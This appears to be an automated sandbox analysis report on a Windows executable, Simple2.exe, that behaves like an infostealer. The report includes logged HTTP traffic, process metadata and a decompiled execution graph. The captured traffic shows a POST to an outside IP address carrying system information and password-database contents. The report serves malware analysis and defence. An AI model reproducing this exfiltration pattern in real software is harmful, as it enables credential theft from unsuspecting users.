            0192.168.2.549704104.26.12.205801520C:\Users\user\Desktop\Simple2.exe
            TimestampBytes transferredDirectionData
            Dec 6, 2024 11:15:10.133362055 CET88OUTGET / HTTP/1.1
            Connection: Keep-Alive
            User-Agent: WinHTTP/1.0
            Host: api.ipify.org
            Dec 6, 2024 11:15:11.248678923 CET430INHTTP/1.1 200 OK
            Date: Fri, 06 Dec 2024 10:15:11 GMT
            Content-Type: text/plain
            Content-Length: 12
            Connection: keep-alive
            Vary: Origin
            CF-Cache-Status: DYNAMIC
            Server: cloudflare
            CF-RAY: 8edb836639eb4204-EWR
            server-timing: cfL4;desc="?proto=TCP&rtt=2110&min_rtt=2110&rtt_var=1055&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=88&delivery_rate=0&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
            Data Raw: 38 2e 34 36 2e 31 32 33 2e 32 32 38
            Data Ascii: 8.46.123.228


            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
            1192.168.2.549705185.237.165.97801520C:\Users\user\Desktop\Simple2.exe
            TimestampBytes transferredDirectionData
            Dec 6, 2024 11:15:12.023067951 CET185OUTPOST /userdata HTTP/1.1
            Connection: Keep-Alive
            Content-Type: multipart/form-data; boundary=WebKitFormBoundary
            User-Agent: WinHTTP/1.0
            Content-Length: 97256
            Host: 185.237.165.97
            Dec 6, 2024 11:15:12.023189068 CET11124OUTData Raw: 2d 2d 57 65 62 4b 69 74 46 6f 72 6d 42 6f 75 6e 64 61 72 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 73 79 73 69 6e 66 6f 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65
            Data Ascii: --WebKitFormBoundaryContent-Disposition: form-data; name="sysinfo"Content-Type: application/json{ "sysinfo": "MACHINE%20INFO%3a%0aMachine%20name%3a%20440BX%20Desktop%20Reference%20Platform%0aProcessor%20name%3a%20Intel%28R%29%20Core%28
            Dec 6, 2024 11:15:12.143285990 CET1236OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Data Ascii:
            Dec 6, 2024 11:15:12.143451929 CET4944OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Data Ascii:
            Dec 6, 2024 11:15:12.143484116 CET2472OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Data Ascii:
            Dec 6, 2024 11:15:12.143500090 CET2472OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Data Ascii:
            Dec 6, 2024 11:15:12.143527985 CET2472OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Data Ascii:
            Dec 6, 2024 11:15:12.143752098 CET4944OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Data Ascii:
            Dec 6, 2024 11:15:12.143873930 CET4944OUTData Raw: 20 75 73 65 72 6e 61 6d 65 5f 76 61 6c 75 65 29 29 29 10 06 17 3d 17 01 00 69 6e 64 65 78 73 71 6c 69 74 65 5f 61 75 74 6f 69 6e 64 65 78 5f 73 74 61 74 73 5f 31 73 74 61 74 73 13 74 0e 07 17 3b 29 01 81 11 69 6e 64 65 78 66 6f 72 65 69 67 6e 5f
            Data Ascii: username_value)))=indexsqlite_autoindex_stats_1statst;)indexforeign_key_index_notespassword_notesCREATE INDEX foreign_key_index_notes ON password_notes (parent_id)K))Qtablepassword_notespassword_notesCREATE TABLE password
            Dec 6, 2024 11:15:12.263560057 CET14832OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Data Ascii:
            Dec 6, 2024 11:15:12.304590940 CET25956OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
            Data Ascii:


            Click to jump to process

            Click to jump to process

            Click to dive into process behavior distribution

            Click to jump to process

            Target ID:0
            Start time:05:15:08
            Start date:06/12/2024
            Path:C:\Users\user\Desktop\Simple2.exe
            Wow64 process (32bit):false
            Commandline:"C:\Users\user\Desktop\Simple2.exe"
            Imagebase:0x7ff6d5ca0000
            File size:79'872 bytes
            MD5 hash:ED207427A25863F5524D616525943DD5
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:low
            Has exited:true

            Target ID:1
            Start time:05:15:08
            Start date:06/12/2024
            Path:C:\Windows\System32\conhost.exe
            Wow64 process (32bit):false
            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Imagebase:0x7ff6d64d0000
            File size:862'208 bytes
            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
            Has elevated privileges:true
            Has administrator privileges:true
            Programmed in:C, C++ or other language
            Reputation:high
            Has exited:true

            Reset < >

              Execution Graph

              Execution Coverage:30.2%
              Dynamic/Decrypted Code Coverage:0%
              Signature Coverage:41.2%
              Total number of Nodes:742
              Total number of Limit Nodes:12
              execution_graph 3733 7ff6d5ca8310 3734 7ff6d5ca7790 _Receive_impl 3 API calls 3733->3734 3735 7ff6d5ca8361 ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3734->3735 3736 7ff6d5ca837a 3735->3736 3737 7ff6d5ca838b 3735->3737 3738 7ff6d5cab180 _Receive_impl free 3736->3738 3738->3737 3871 7ff6d5cac190 3872 7ff6d5cac1a3 ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3871->3872 3873 7ff6d5cac1b8 3871->3873 3872->3873 3874 7ff6d5cac790 3875 7ff6d5cac7b0 3874->3875 3876 7ff6d5cac7a3 3874->3876 3877 7ff6d5ca7fd0 Concurrency::details::SchedulerBase::GetBitSet 2 API calls 3876->3877 3877->3875 3739 7ff6d5cac70e ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA 3222 7ff6d5ca7590 3223 7ff6d5ca75bd 3222->3223 3224 7ff6d5ca75b8 3222->3224 3224->3223 3226 7ff6d5ca7631 3224->3226 3227 7ff6d5ca7640 3224->3227 3229 7ff6d5ca763e 3224->3229 3225 7ff6d5cab188 std::_Facet_Register 3 API calls 3234 7ff6d5ca7645 3225->3234 3226->3229 3230 7ff6d5ca7783 3226->3230 3227->3225 3227->3234 3228 7ff6d5ca7692 memcpy 3237 7ff6d5ca76cb 3228->3237 3229->3223 3232 7ff6d5cab188 std::_Facet_Register 3 API calls 3229->3232 3231 7ff6d5ca1270 Concurrency::cancel_current_task __std_exception_copy 3230->3231 3233 7ff6d5ca7788 3231->3233 3232->3234 3234->3228 3235 7ff6d5ca775e _invalid_parameter_noinfo_noreturn 3234->3235 3235->3223 3236 7ff6d5ca7730 3239 7ff6d5cab180 3236->3239 3237->3223 3237->3235 3237->3236 3240 7ff6d5cab8fc free 3239->3240 3740 7ff6d5ca6510 3741 7ff6d5ca6550 3740->3741 3742 7ff6d5ca6523 3740->3742 3742->3741 3743 7ff6d5ca6533 fflush 3742->3743 3878 7ff6d5ca7090 3879 7ff6d5ca70a3 3878->3879 3880 7ff6d5ca709c _lock_file 3878->3880 3880->3879 3881 7ff6d5ca7190 3882 7ff6d5ca71a1 3881->3882 3883 7ff6d5ca71ce 3881->3883 3884 7ff6d5ca71c6 3882->3884 3885 7ff6d5ca71e1 _invalid_parameter_noinfo_noreturn 3882->3885 3886 7ff6d5cab180 _Receive_impl free 3884->3886 3887 7ff6d5ca71fe 3885->3887 3886->3883 3744 7ff6d5cab508 3745 7ff6d5cab518 3744->3745 3757 7ff6d5cab30c 3745->3757 3747 7ff6d5cabb0c 9 API calls 3748 7ff6d5cab5bd 3747->3748 3749 7ff6d5cab53c _RTC_Initialize 3754 7ff6d5cab59f 3749->3754 3765 7ff6d5cabdd0 InitializeSListHead 3749->3765 3754->3747 3756 7ff6d5cab5ad 3754->3756 3758 7ff6d5cab34f 3757->3758 3759 7ff6d5cab31d 3757->3759 3758->3749 3760 7ff6d5cab38c 3759->3760 3763 7ff6d5cab322 __scrt_release_startup_lock 3759->3763 3761 7ff6d5cabb0c 9 API calls 3760->3761 3762 7ff6d5cab396 3761->3762 3763->3758 3764 7ff6d5cab33f _initialize_onexit_table 3763->3764 3764->3758 3766 7ff6d5cac906 3767 7ff6d5cac92f 3766->3767 3768 7ff6d5cac93b __current_exception __current_exception_context terminate 3766->3768 3768->3767 3191 7ff6d5ca1000 ?_Init@locale@std@@CAPEAV_Locimp@12@_N 3195 7ff6d5cab188 3191->3195 3194 7ff6d5ca10f0 3196 7ff6d5cab1a2 malloc 3195->3196 3197 7ff6d5cab193 3196->3197 3198 7ff6d5ca1079 ??0?$codecvt@_WDU_Mbstatet@@@std@@QEAA@_K ?_New_Locimp@_Locimp@locale@std@@CAPEAV123@AEBV123@ ??Bid@locale@std@ ?_Addfac@_Locimp@locale@std@@AEAAXPEAVfacet@23@_K ??4?$_Yarn@D@std@@QEAAAEAV01@PEBD 3196->3198 3197->3196 3199 7ff6d5cab1b2 3197->3199 3198->3194 3200 7ff6d5cab1bd 3199->3200 3204 7ff6d5cab924 3199->3204 3207 7ff6d5ca1270 3200->3207 3203 7ff6d5cab1c3 3210 7ff6d5cab904 3204->3210 3206 7ff6d5cab932 _CxxThrowException 3208 7ff6d5ca127e Concurrency::cancel_current_task 3207->3208 3209 7ff6d5ca128f __std_exception_copy 3208->3209 3209->3203 3210->3206 3888 7ff6d5ca7880 3891 7ff6d5ca78bb 3888->3891 3889 7ff6d5cab160 Concurrency::cancel_current_task 8 API calls 3890 7ff6d5ca79da 3889->3890 3891->3889 3893 7ff6d5cac97d _seh_filter_exe 3190 7ff6d5ca96b0 ?widen@?$basic_ios@DU?$char_traits@D@std@@@std@@QEBADD ?put@?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV12@D ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12 3774 7ff6d5cac430 3775 7ff6d5cac450 3774->3775 3776 7ff6d5cac443 3774->3776 3778 7ff6d5ca7fd0 3776->3778 3779 7ff6d5ca800f 3778->3779 3780 7ff6d5ca7fe3 3778->3780 3779->3775 3781 7ff6d5ca8007 3780->3781 3782 7ff6d5ca8028 _invalid_parameter_noinfo_noreturn 3780->3782 3783 7ff6d5cab180 _Receive_impl free 3781->3783 3783->3779 3784 7ff6d5ca8430 ?uncaught_exception@std@ 3785 7ff6d5ca8443 ?_Osfx@?$basic_ostream@_WU?$char_traits@_W@std@@@std@ 3784->3785 3786 7ff6d5ca844d 3784->3786 3785->3786 3787 7ff6d5ca8230 3793 7ff6d5ca70b0 3787->3793 3796 7ff6d5ca70cd 3793->3796 3794 7ff6d5ca7175 ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA 3795 7ff6d5ca714c ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 3795->3794 3796->3794 3796->3795 3797 7ff6d5ca8470 10 API calls 3796->3797 3798 7ff6d5ca713f fclose 3797->3798 3798->3795 3894 7ff6d5ca83b0 ??1?$codecvt@_WDU_Mbstatet@@@std@@MEAA 3895 7ff6d5ca83e1 3894->3895 3896 7ff6d5ca83d4 3894->3896 3897 7ff6d5cab180 _Receive_impl free 3896->3897 3897->3895 3799 7ff6d5ca1730 3800 7ff6d5ca7790 _Receive_impl 3 API calls 3799->3800 3801 7ff6d5ca1772 ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3800->3801 3898 7ff6d5ca6eb0 3899 7ff6d5ca6ed6 3898->3899 3902 7ff6d5ca6edd 3898->3902 3900 7ff6d5cab160 Concurrency::cancel_current_task 8 API calls 3899->3900 3901 7ff6d5ca7056 3900->3901 3902->3899 3903 7ff6d5ca6f63 fputc 3902->3903 3904 7ff6d5ca6f85 ?out@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD 3902->3904 3903->3899 3905 7ff6d5ca6ff4 3904->3905 3906 7ff6d5ca6fca 3904->3906 3905->3899 3907 7ff6d5ca7003 fwrite 3905->3907 3906->3905 3908 7ff6d5ca6fcf 3906->3908 3907->3899 3908->3899 3909 7ff6d5ca6fd4 fputc 3908->3909 3909->3899 3910 7ff6d5cac9ac 3912 7ff6d5cac9b4 3910->3912 3911 7ff6d5caca01 3912->3911 3913 7ff6d5cab180 _Receive_impl free 3912->3913 3913->3912 3211 7ff6d5ca6920 3212 7ff6d5ca6942 3211->3212 3213 7ff6d5ca6937 3211->3213 3214 7ff6d5ca6949 ?xsgetn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEAD_J 3212->3214 3215 7ff6d5ca6958 3212->3215 3214->3215 3216 7ff6d5ca697d memcpy 3215->3216 3219 7ff6d5ca69b2 3215->3219 3216->3219 3217 7ff6d5ca6a4e 3218 7ff6d5ca6a2e 3218->3217 3221 7ff6d5ca6a33 fread 3218->3221 3219->3217 3219->3218 3220 7ff6d5ca6a00 fread 3219->3220 3220->3217 3220->3219 3221->3217 3802 7ff6d5ca1220 __std_exception_destroy 3807 7ff6d5cac818 ?setstate@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEAAXH_N 3808 7ff6d5cab71a 3809 7ff6d5cabc5c GetModuleHandleW 3808->3809 3810 7ff6d5cab721 3809->3810 3811 7ff6d5cab760 _exit 3810->3811 3812 7ff6d5cab725 3810->3812 3189 7ff6d5ca98d0 ?widen@?$basic_ios@_WU?$char_traits@_W@std@@@std@@QEBA_WD ?put@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12@_W ?flush@?$basic_ostream@_WU?$char_traits@_W@std@@@std@@QEAAAEAV12 3813 7ff6d5ca82d0 3814 7ff6d5ca7790 _Receive_impl 3 API calls 3813->3814 3815 7ff6d5ca82e4 3814->3815 3816 7ff6d5ca82f6 3815->3816 3817 7ff6d5cab180 _Receive_impl free 3815->3817 3817->3816 3818 7ff6d5cab5d0 3822 7ff6d5cabcb0 SetUnhandledExceptionFilter 3818->3822 3824 7ff6d5ca11d0 __std_exception_destroy 3825 7ff6d5ca1205 3824->3825 3826 7ff6d5ca11f8 3824->3826 3827 7ff6d5cab180 _Receive_impl free 3826->3827 3827->3825 3914 7ff6d5ca6850 3915 7ff6d5ca6869 ?xsputn@?$basic_streambuf@DU?$char_traits@D@std@@@std@@MEAA_JPEBD_J 3914->3915 3916 7ff6d5ca6878 3914->3916 3915->3916 3917 7ff6d5ca68f9 3916->3917 3918 7ff6d5ca68d9 3916->3918 3919 7ff6d5ca68ac memcpy 3916->3919 3918->3917 3920 7ff6d5ca68e5 fwrite 3918->3920 3919->3917 3919->3918 3920->3917 3921 7ff6d5ca6450 3922 7ff6d5ca6461 3921->3922 3929 7ff6d5ca649e 3921->3929 3923 7ff6d5ca9cb0 2 API calls 3922->3923 3924 7ff6d5ca646a 3923->3924 3925 7ff6d5ca6496 3924->3925 3926 7ff6d5ca64b1 _invalid_parameter_noinfo_noreturn 3924->3926 3927 7ff6d5cab180 _Receive_impl free 3925->3927 3933 7ff6d5ca9aa0 ??0_Lockit@std@@QEAA@H ??Bid@locale@std@ 3926->3933 3927->3929 3931 7ff6d5ca64e5 3932 7ff6d5ca64f8 ?_Init@?$basic_streambuf@DU?$char_traits@D@std@@@std@ 3934 7ff6d5ca9b02 3933->3934 3935 7ff6d5ca9b77 ??1_Lockit@std@@QEAA 3934->3935 3936 7ff6d5ca9b19 ?_Getgloballocale@locale@std@@CAPEAV_Locimp@12 3934->3936 3937 7ff6d5ca9b25 3934->3937 3938 7ff6d5cab160 Concurrency::cancel_current_task 8 API calls 3935->3938 3936->3937 3937->3935 3940 7ff6d5ca9b3c ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SA_KPEAPEBVfacet@locale@2@PEBV42@ 3937->3940 3939 7ff6d5ca64d5 ?always_noconv@codecvt_base@std@ 3938->3939 3939->3931 3939->3932 3941 7ff6d5ca9b50 3940->3941 3942 7ff6d5ca9ba7 3940->3942 3947 7ff6d5cab0c8 3941->3947 3950 7ff6d5ca1470 3942->3950 3946 7ff6d5ca9bac 3948 7ff6d5cab188 std::_Facet_Register 3 API calls 3947->3948 3949 7ff6d5ca9b62 3948->3949 3949->3935 3953 7ff6d5ca1440 3950->3953 3952 7ff6d5ca147e _CxxThrowException __std_exception_copy 3952->3946 3953->3952 3831 7ff6d5cac8c0 ??1_Lockit@std@@QEAA 3832 7ff6d5cac1be ??1?$basic_ostream@DU?$char_traits@D@std@@@std@@UEAA 3242 7ff6d5ca6740 3243 7ff6d5ca6773 3242->3243 3250 7ff6d5ca67d1 3243->3250 3251 7ff6d5ca8470 3243->3251 3246 7ff6d5ca6796 3248 7ff6d5ca67a4 _fseeki64 3246->3248 3249 7ff6d5ca67bb fgetpos 3246->3249 3246->3250 3248->3249 3248->3250 3249->3250 3263 7ff6d5cab160 3250->3263 3252 7ff6d5ca8543 3251->3252 3253 7ff6d5ca8493 3251->3253 3254 7ff6d5cab160 Concurrency::cancel_current_task 8 API calls 3252->3254 3253->3252 3255 7ff6d5ca849d 3253->3255 3256 7ff6d5ca8552 3254->3256 3257 7ff6d5ca84b6 ?unshift@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEAD1AEAPEAD 3255->3257 3258 7ff6d5ca84e1 3255->3258 3256->3246 3259 7ff6d5ca84dc 3257->3259 3260 7ff6d5cab160 Concurrency::cancel_current_task 8 API calls 3258->3260 3259->3258 3262 7ff6d5ca8517 fwrite 3259->3262 3261 7ff6d5ca84fe 3260->3261 3261->3246 3262->3258 3264 7ff6d5cab169 3263->3264 3265 7ff6d5ca683b 3264->3265 3266 7ff6d5cab7b4 IsProcessorFeaturePresent 3264->3266 3267 7ff6d5cab7cc 3266->3267 3272 7ff6d5cab888 RtlCaptureContext 3267->3272 3273 7ff6d5cab8a2 RtlLookupFunctionEntry 3272->3273 3274 7ff6d5cab7df 3273->3274 3275 7ff6d5cab8b8 RtlVirtualUnwind 3273->3275 3276 7ff6d5cab780 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 3274->3276 3275->3273 3275->3274 3833 7ff6d5ca6dc0 3834 7ff6d5ca6ddb 3833->3834 3835 7ff6d5ca6e2b ungetc 3834->3835 3836 7ff6d5ca6df1 3834->3836 3835->3836 3837 7ff6d5ca83f0 3842 7ff6d5ca7c90 3837->3842 3839 7ff6d5ca8404 3840 7ff6d5ca8416 3839->3840 3841 7ff6d5cab180 _Receive_impl free 3839->3841 3841->3840 3843 7ff6d5ca7cb1 3842->3843 3845 7ff6d5ca7ce7 3842->3845 3846 7ff6d5ca7d6d _invalid_parameter_noinfo_noreturn 3843->3846 3847 7ff6d5cab180 _Receive_impl free 3843->3847 3844 7ff6d5ca7d30 3844->3839 3845->3844 3845->3846 3848 7ff6d5ca7d28 3845->3848 3850 7ff6d5ca7d93 3846->3850 3851 7ff6d5ca7dc4 3846->3851 3847->3845 3849 7ff6d5cab180 _Receive_impl free 3848->3849 3849->3844 3852 7ff6d5ca7dbc 3850->3852 3853 7ff6d5ca7ddb _invalid_parameter_noinfo_noreturn 3850->3853 3851->3839 3854 7ff6d5cab180 _Receive_impl free 3852->3854 3854->3851 3855 7ff6d5ca81f0 3856 7ff6d5ca70b0 13 API calls 3855->3856 3857 7ff6d5ca8204 3856->3857 3858 7ff6d5ca8216 3857->3858 3859 7ff6d5cab180 _Receive_impl free 3857->3859 3859->3858 3958 7ff6d5cac170 3959 7ff6d5cab180 _Receive_impl free 3958->3959 3960 7ff6d5cac187 3959->3960 3961 7ff6d5ca6a70 3962 7ff6d5ca6aa7 3961->3962 3963 7ff6d5ca6b3e fgetc 3962->3963 3964 7ff6d5ca6b22 fgetc 3962->3964 3966 7ff6d5ca6ab7 3962->3966 3969 7ff6d5ca6c74 3963->3969 3974 7ff6d5ca6b6b 3963->3974 3964->3966 3965 7ff6d5cab160 Concurrency::cancel_current_task 8 API calls 3967 7ff6d5ca6d2b 3965->3967 3966->3965 3968 7ff6d5ca6d18 3973 7ff6d5cab180 _Receive_impl free 3968->3973 3969->3966 3969->3968 3972 7ff6d5ca6caf _invalid_parameter_noinfo_noreturn 3969->3972 3970 7ff6d5ca6baa ?in@?$codecvt@DDU_Mbstatet@@@std@@QEBAHAEAU_Mbstatet@@PEBD1AEAPEBDPEAD3AEAPEAD 3970->3974 3972->3969 3973->3966 3974->3969 3974->3970 3975 7ff6d5ca6c1b memcpy fgetc 3974->3975 3976 7ff6d5ca6cce 3974->3976 3978 7ff6d5caa0a0 3974->3978 3975->3969 3975->3974 3976->3969 3977 7ff6d5ca6cf0 ungetc 3976->3977 3977->3969 3977->3976 3979 7ff6d5caa0cf 3978->3979 3980 7ff6d5caa1f4 3978->3980 3981 7ff6d5caa12a 3979->3981 3984 7ff6d5caa152 3979->3984 3985 7ff6d5caa11d 3979->3985 3998 7ff6d5ca1310 ?_Xlength_error@std@@YAXPEBD 3980->3998 3986 7ff6d5cab188 std::_Facet_Register 3 API calls 3981->3986 3983 7ff6d5caa1f9 3988 7ff6d5ca1270 Concurrency::cancel_current_task __std_exception_copy 3983->3988 3987 7ff6d5caa13f 3984->3987 3990 7ff6d5cab188 std::_Facet_Register 3 API calls 3984->3990 3985->3981 3985->3983 3986->3987 3989 7ff6d5caa1bd _invalid_parameter_noinfo_noreturn 3987->3989 3992 7ff6d5caa1c4 memcpy 3987->3992 3993 7ff6d5caa17a memcpy 3987->3993 3991 7ff6d5caa1ff 3988->3991 3989->3992 3990->3987 3995 7ff6d5caa1bb 3992->3995 3994 7ff6d5caa19b 3993->3994 3996 7ff6d5caa1b0 3993->3996 3994->3989 3994->3996 3995->3970 3997 7ff6d5cab180 _Receive_impl free 3996->3997 3997->3995 3999 7ff6d5ca7070 4000 7ff6d5ca7083 3999->4000 4001 7ff6d5ca707c _unlock_file 3999->4001 4001->4000 4002 7ff6d5ca1170 __std_exception_copy 3860 7ff6d5cabff4 3861 7ff6d5cac02c __GSHandlerCheckCommon 3860->3861 3862 7ff6d5cac058 3861->3862 3863 7ff6d5cac047 __CxxFrameHandler4 3861->3863 3863->3862 4003 7ff6d5cab768 4006 7ff6d5cabd1c 4003->4006 4007 7ff6d5cabd3f GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 4006->4007 4008 7ff6d5cab771 4006->4008 4007->4008 3277 7ff6d5cab5ec 3278 7ff6d5cab605 3277->3278 3279 7ff6d5cab743 3278->3279 3280 7ff6d5cab60d __scrt_acquire_startup_lock 3278->3280 3527 7ff6d5cabb0c IsProcessorFeaturePresent 3279->3527 3282 7ff6d5cab74d 3280->3282 3287 7ff6d5cab62b __scrt_release_startup_lock 3280->3287 3283 7ff6d5cabb0c 9 API calls 3282->3283 3284 7ff6d5cab758 3283->3284 3286 7ff6d5cab760 _exit 3284->3286 3285 7ff6d5cab650 3287->3285 3288 7ff6d5cab6d6 _get_initial_narrow_environment __p___argv __p___argc 3287->3288 3291 7ff6d5cab6ce _register_thread_local_exe_atexit_callback 3287->3291 3297 7ff6d5ca5540 GetConsoleWindow ShowWindow 3288->3297 3291->3288 3294 7ff6d5cab703 3295 7ff6d5cab708 _cexit 3294->3295 3296 7ff6d5cab70d 3294->3296 3295->3296 3296->3285 3533 7ff6d5ca9260 3297->3533 3299 7ff6d5ca55bc 3539 7ff6d5ca41f0 3299->3539 3303 7ff6d5ca55d3 3304 7ff6d5ca5614 3303->3304 3305 7ff6d5ca560f 3303->3305 3307 7ff6d5ca5608 _invalid_parameter_noinfo_noreturn 3303->3307 3306 7ff6d5ca9260 11 API calls 3304->3306 3308 7ff6d5cab180 _Receive_impl free 3305->3308 3309 7ff6d5ca562a 3306->3309 3307->3305 3308->3304 3591 7ff6d5ca3e70 GetLocaleInfoA 3309->3591 3312 7ff6d5ca7f40 11 API calls 3313 7ff6d5ca5641 3312->3313 3314 7ff6d5ca5682 3313->3314 3316 7ff6d5ca567d 3313->3316 3317 7ff6d5ca5676 _invalid_parameter_noinfo_noreturn 3313->3317 3315 7ff6d5ca9260 11 API calls 3314->3315 3319 7ff6d5ca5698 GetSystemInfo memset 3315->3319 3318 7ff6d5cab180 _Receive_impl free 3316->3318 3317->3316 3318->3314 3627 7ff6d5ca6390 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@ ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA 3319->3627 3321 7ff6d5ca56c3 3628 7ff6d5ca94e0 3321->3628 3324 7ff6d5ca94e0 9 API calls 3325 7ff6d5ca56f4 3324->3325 3326 7ff6d5ca94e0 9 API calls 3325->3326 3327 7ff6d5ca5707 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@K 3326->3327 3328 7ff6d5ca94e0 9 API calls 3327->3328 3329 7ff6d5ca5723 3328->3329 3642 7ff6d5ca8760 3329->3642 3331 7ff6d5ca5734 3648 7ff6d5ca7790 3331->3648 3333 7ff6d5ca5773 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3334 7ff6d5ca7f40 11 API calls 3333->3334 3335 7ff6d5ca579c 3334->3335 3336 7ff6d5ca57dd 3335->3336 3337 7ff6d5ca57d8 3335->3337 3339 7ff6d5ca57d1 _invalid_parameter_noinfo_noreturn 3335->3339 3338 7ff6d5ca9260 11 API calls 3336->3338 3340 7ff6d5cab180 _Receive_impl free 3337->3340 3341 7ff6d5ca57f3 GlobalMemoryStatusEx memset 3338->3341 3339->3337 3340->3336 3342 7ff6d5ca6390 ??0?$basic_ios@DU?$char_traits@D@std@@@std@@IEAA ??0?$basic_iostream@DU?$char_traits@D@std@@@std@@QEAA@PEAV?$basic_streambuf@DU?$char_traits@D@std@@@1@ ??0?$basic_streambuf@DU?$char_traits@D@std@@@std@@IEAA 3341->3342 3343 7ff6d5ca5826 3342->3343 3344 7ff6d5ca94e0 9 API calls 3343->3344 3345 7ff6d5ca5843 ??6?$basic_ostream@DU?$char_traits@D@std@@@std@@QEAAAEAV01@_K 3344->3345 3346 7ff6d5ca94e0 9 API calls 3345->3346 3347 7ff6d5ca585e 3346->3347 3348 7ff6d5ca8760 8 API calls 3347->3348 3349 7ff6d5ca586f 3348->3349 3350 7ff6d5ca7790 _Receive_impl ??1?$basic_streambuf@DU?$char_traits@D@std@@@std@@UEAA _invalid_parameter_noinfo_noreturn free 3349->3350 3351 7ff6d5ca58a7 ??1?$basic_iostream@DU?$char_traits@D@std@@@std@@UEAA ??1?$basic_ios@DU?$char_traits@D@std@@@std@@UEAA 3350->3351 3352 7ff6d5ca7f40 11 API calls 3351->3352 3353 7ff6d5ca58d0 3352->3353 3354 7ff6d5ca5911 3353->3354 3356 7ff6d5ca590c 3353->3356 3358 7ff6d5ca5905 _invalid_parameter_noinfo_noreturn 3353->3358 3355 7ff6d5ca9260 11 API calls 3354->3355 3357 7ff6d5ca5927 3355->3357 3359 7ff6d5cab180 _Receive_impl free 3356->3359 3360 7ff6d5ca37a0 53 API calls 3357->3360 3358->3356 3359->3354 3361 7ff6d5ca5931 3360->3361 3362 7ff6d5ca7f40 11 API calls 3361->3362 3363 7ff6d5ca593e 3362->3363 3364 7ff6d5ca597f 3363->3364 3365 7ff6d5ca597a 